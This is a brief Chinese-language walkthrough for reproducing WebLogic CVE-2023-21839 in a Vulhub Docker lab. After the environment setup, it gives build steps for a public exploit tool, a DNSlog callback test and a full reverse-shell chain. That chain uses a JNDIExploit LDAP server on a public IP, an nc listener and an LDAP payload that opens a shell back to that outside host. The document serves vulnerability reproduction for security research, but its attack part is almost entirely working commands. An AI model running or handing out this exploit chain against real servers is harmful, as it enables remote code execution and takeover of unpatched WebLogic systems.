简介
Vulhub是一个基于docker
和docker-compose
的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
Github地址:https://github.com/vulhub/vulhub
1 2 3 4 5 6
| git clone https://github.com/vulhub/vulhub.git
cd vulhub/xxx
docker-compose up
|
漏洞环境
靶场:192.168.199.132
1 2
| cd vulhub/weblogic/CVE-2023-21839 docker-compose up
|
环境启动后,访问后台:http://x.x.x.x:7001/console/login/LoginForm.jsp
漏洞复现
1)工具:
下载地址:https://github.com/4ra1n/CVE-2023-21839
编译软件
1 2
| cd cmd/ go build -o CVE-2023-21839.exe
|
2)dnslog回显
1
| CVE-2023-21839.exe -ip 192.168.199.132 -port 7001 -ldap ldap://m9ezsq.dnslog.cn/
|
3)反弹shell
使用Jndi漏洞利用工具,在公网服务器开启ldap服务,监听11389端口
1 2 3 4 5 6 7 8
| java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 121.4.69.24 -l 11389 -p 18080
nc -lvp 18888
CVE-2023-21839.exe -ip 192.168.199.132 -port 7001 -ldap ldap://121.4.69.24:11389/Basic/ReverseShell/121.4.69.24/18888
|